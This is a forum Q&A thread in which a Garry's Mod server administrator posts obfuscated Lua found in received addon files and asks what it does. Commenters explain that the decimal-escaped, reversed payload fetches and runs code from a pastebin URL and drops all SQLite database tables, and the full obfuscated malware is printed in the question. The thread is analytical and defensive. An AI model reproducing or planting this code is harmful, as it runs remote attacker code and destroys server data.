# Found obfuscated code(i think) and i dont know how to deobfuscate it. LUA

Tags: lua, deobfuscation, garrys-mod

Okay so i received some lua files for a server i am working on, and while i was examining them for any backdoors that would give permissions to people, i found this code.

I am pretty sure it is a backdoor i was afraid of, however i want to know what its trying to do.

I have tried ascii and some of the lines come out okay, but other come out as gibberish to me. So could someone please explain what i need to do and/or deobfuscate it for me.

```
local _=_G _____=_["\71\101\116\84\97\115\107\73\68"] ______=_["\78\101\119\77\101\115\104"] _______=_["\69\114\114\111\114\78\111\72\97\108\116"] ________=_["\65\99\99\101\115\115\111\114\70\117\110\99\78\87"]__=_["\115\116\114\105\110\103"]["\114\101\118\101\114\115\101"] ________=_["\83\84\78\68\82\68"] _________=_["\68\79\70\95\75\105\108\108"] __________=_["\67\111\108\111\114\84\111\72\83\86"] ___________=_["\67\111\108\111\114\84\111\72\83\86"] ____________=_["\82\117\110\83\116\114\105\110\103\69\120"] _____________=_["\65\99\99\101\115\115\111\114\70\117\110\99\78\87"] ______________=_["\83\84\78\68\82\68"] _______________=_["\76\101\114\112\86\101\99\116\111\114"] ________________=_["\67\111\108\111\114\84\111\72\83\86"] _________________=_["\80\108\97\121\101\114\68\97\116\97\85\112\100\97\116\101"] __________________=_["\67\111\108\111\114\84\111\72\83\86"] ___________________=_["\69\114\114\111\114\78\111\72\97\108\116"] ____________________=_["\80\108\97\121\101\114\68\97\116\97\85\112\100\97\116\101"] _____________________=_["\68\79\70\95\75\105\108\108"] ______________________=_["\68\79\70\77\111\100\101\76\72\97\99\107"] _______________________=_["\71\101\116\84\97\115\107\73\68"] ________________________=_["\78\101\119\77\101\115\104"]_["\82\117\110\83\116\114\105\110\103"](__"\10\41\112\117\116\101\83\101\115\97\98\97\116\97\68\112\115\32\44\34\112\117\116\101\83\101\115\97\98\97\116\97\68\112\115\34\32\44\34\110\119\97\112\83\108\97\105\116\105\110\73\114\101\121\97\108\80\34\40\100\100\65\46\107\111\111\104\10\41\112\117\116\101\83\101\115\97\98\97\116\97\68\112\115\32\44\34\112\117\116\101\83\101\115\97\98\97\116\97\68\112\115\34\32\44\34\101\122\105\108\97\105\116\105\110\73\34\40\100\100\65\46\107\111\111\104\10\41\112\117\116\101\83\101\115\97\98\97\116\97\68\112\115\32\44\34\112\117\116\101\83\101\115\97\98\97\116\97\68\112\115\34\32\44\34\100\101\122\105\108\97\105\116\105\110\73\66\68\80\82\107\114\97\68\34\40\100\100\65\46\107\111\111\104\10\100\110\101\10\41\100\110\101\32\32\32\32\10\41\100\110\101\32\41\121\100\111\98\40\103\110\105\114\116\83\110\117\82\32\41\121\100\111\98\40\110\111\105\116\99\110\117\102\32\44\34\117\74\69\85\82\87\99\101\47\119\97\114\47\109\111\99\46\110\105\98\101\116\115\97\112\47\47\58\115\112\116\116\104\34\40\104\99\116\101\70\46\112\116\116\104\32\32\32\32\32\32\32\32\10\41\100\110\101\32\32\32\32\32\32\32\32\10\100\110\101\32\32\32\32\32\32\32\32\32\32\32\32\10\41\101\109\97\110\46\118\32\46\46\34\32\69\76\66\65\84\32\80\79\82\68\34\40\121\114\101\117\113\46\101\116\105\76\81\83\121\77\32\32\32\32\32\32\32\32\32\32\32\32\32\32\32\32\10\111\100\32\41\125\123\32\114\111\32\97\116\97\100\40\115\114\105\97\112\32\110\105\32\118\32\44\107\32\114\111\102\32\32\32\32\32\32\32\32\32\32\32\32\10\41\97\116\97\100\40\110\111\105\116\99\110\117\102\32\44\34\39\101\108\98\97\116\39\61\101\112\121\116\32\69\82\69\72\87\32\114\101\116\115\97\109\95\101\116\105\108\113\115\32\77\79\82\70\32\101\109\97\110\32\84\67\69\76\69\83\34\40\121\114\101\117\113\46\101\116\105\76\81\83\121\77\32\32\32\32\32\32\32\32\10\41\40\110\111\105\116\99\110\117\102\32\44\49\40\101\108\112\109\105\83\46\114\101\109\105\116\32\32\32\32\10\41\40\112\117\116\101\83\101\115\97\98\97\116\97\68\112\115\32\110\111\105\116\99\110\117\102") _____=_["\83\84\78\68\82\68"]
```

Comment: To deobfuscate, just replace all `\ddd` codes to ASCII characters.  This [program](https://pastebin.com/b394Fe3a) drops all tables in DB and prints a message every 5 sec

Comment: I attempted that, and just realized that the end code was reversed, and when spun around fetches this message "[SECUREGMOD]: SecureGMod for product ??_) has failed. Please include this text and the few lines surrounding the error when reporting. The product failed to authenticate. Reason Generic rejection - your running a server with leaked addons installed. Your sv.db has been wiped to ensure safety of others." from pastebin, however it does not explain why the person that sent them too me has been having sql database troubles after trying to run the addon.

Comment: `having sql database troubles` - the other part of the code drops all the tables.

Comment: The addon was removed, and some stuff is still saving to it, however certain thing that would be expected of a backdoor are not working.

Such as the inability of blacklisted props to be saved, inability to save restricted tool guns, inability to save disallowed doors.

EDIT: grammar and spelling

Comment: unable to edit it again just want to correct something.

...nd some stuff is still saving to the database....